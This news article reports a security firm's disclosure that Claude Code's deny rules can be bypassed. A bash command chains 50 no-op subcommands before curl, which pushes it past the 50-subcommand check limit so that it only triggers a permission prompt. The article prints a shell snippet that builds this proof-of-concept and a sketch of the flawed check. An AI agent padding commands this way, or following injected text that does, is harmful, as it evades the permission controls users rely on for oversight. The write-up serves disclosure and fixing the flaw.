Security vulnerabilities in Claude Code, Anthropic's coding agent, have been exposed following a leak of its source code. The discovery, made by Tel Aviv-based security firm Adversa, shows that Claude Code can bypass its own security protocols under certain conditions, notably via prompt injection attacks. The flaw allows the model to ignore deny rules designed to block risky actions when it is presented with a sufficiently long chain of subcommands.
Claude Code uses several mechanisms to control access to specific commands, such as curl, which makes network requests from the command line and can pose a significant security risk in the hands of an overly permissive AI model. To prevent Claude from executing curl commands, for instance, a user can add a deny rule to the settings file ~/.claude/settings.json.
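Such a rule might look like the following sketch. The pattern shown follows Claude Code's documented permission format, though the exact matcher syntax may vary between versions:

```json
{
  "permissions": {
    "deny": [
      "Bash(curl:*)"
    ]
  }
}
```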
However, the effectiveness of these deny rules is limited. According to a comment in the source file bashPermissions.ts, security checks are capped at 50 subcommands by the constant MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. Beyond that threshold, Claude Code falls back to asking the user for permission rather than enforcing the deny rules. The fallback was intended as a safeguard against unauthorized actions, but it fails to account for commands generated by the AI itself: Adversa's AI Red Team notes that the original design assumed human-authored commands would stay within safe bounds.
The Adversa team demonstrated a proof-of-concept attack with a bash command consisting of 50 no-op "true" subcommands followed by a curl command. Rather than blocking the curl outright, Claude merely prompted for authorization to proceed. This is particularly concerning in environments where developers routinely grant blanket permissions or reflexively approve actions during long coding sessions, and in CI/CD pipelines that run Claude Code non-interactively, where unauthorized actions are more likely to slip through.
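The shape of that proof-of-concept is easy to reproduce. The snippet below builds the command string programmatically rather than typing out 50 subcommands; example.com stands in for any attacker-chosen host:

```shell
# Build the proof-of-concept: 50 no-op "true" subcommands, then curl.
chain=""
i=0
while [ "$i" -lt 50 ]; do
  chain="${chain}true && "
  i=$((i + 1))
done
chain="${chain}curl https://example.com"

# A checker that inspects only the first 50 subcommands never reaches
# the curl, which sits in position 51:
echo "$chain" | tr -s ' ' '\n' | grep -c -E '^(true|curl)$'   # prints 51
```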
Interestingly, Anthropic appears to have already built a fix based on tree-sitter, an open-source parsing library. Although the parser is functional internally, it has not yet shipped in public builds. Adversa argues that this gap represents a significant flaw in Claude Code's security policy enforcement, with potential regulatory and compliance ramifications if left unaddressed. The firm also points to a simpler stopgap: a one-line change in bashPermissions.ts, switching the "behavior" key from "ask" to "deny", would close the hole.
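The logic at issue can be illustrated with a short TypeScript sketch. This is not Anthropic's actual code: only the constant name comes from the leaked bashPermissions.ts, and the function, types, and deny pattern here are hypothetical.

```typescript
// Hypothetical reconstruction of the permission check; only the constant
// name below is taken from the leaked bashPermissions.ts.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;

// Assumed deny rule: block any subcommand that invokes curl.
const denyPatterns: RegExp[] = [/^curl\b/];

type Decision = "allow" | "ask" | "deny";

function checkBashCommand(subcommands: string[]): Decision {
  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    // Current behavior: give up on analysis and ask the user.
    // Adversa's proposed fix: return "deny" here to fail closed.
    return "ask";
  }
  for (const sub of subcommands) {
    if (denyPatterns.some((p) => p.test(sub))) {
      return "deny";
    }
  }
  return "allow";
}

// 50 no-op subcommands push the curl into position 51, past the cap:
const attack = [...Array(50).fill("true"), "curl https://example.com"];
console.log(checkBashCommand(attack)); // "ask", not "deny"
```

With the cap exceeded, the deny patterns are never consulted, which is why failing closed ("deny") rather than open ("ask") removes the bypass.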
As of now, Anthropic has not publicly commented on the situation. The implications of this discovery extend beyond mere technical flaws, highlighting the ongoing challenges in AI safety and security as these systems become increasingly integrated into coding practices. With AI tools gaining traction in various sectors, the need for robust security measures remains paramount.
See also
OpenAI’s Rogue AI Safeguards: Decoding the 2025 Safety Revolution
US AI Developments in 2025 Set Stage for 2026 Compliance Challenges and Strategies
Trump Drafts Executive Order to Block State AI Regulations, Centralizing Authority Under Federal Control
California Court Rules AI Misuse Heightens Lawyer’s Responsibilities in Noland Case
Policymakers Urged to Establish Comprehensive Regulations for AI in Mental Health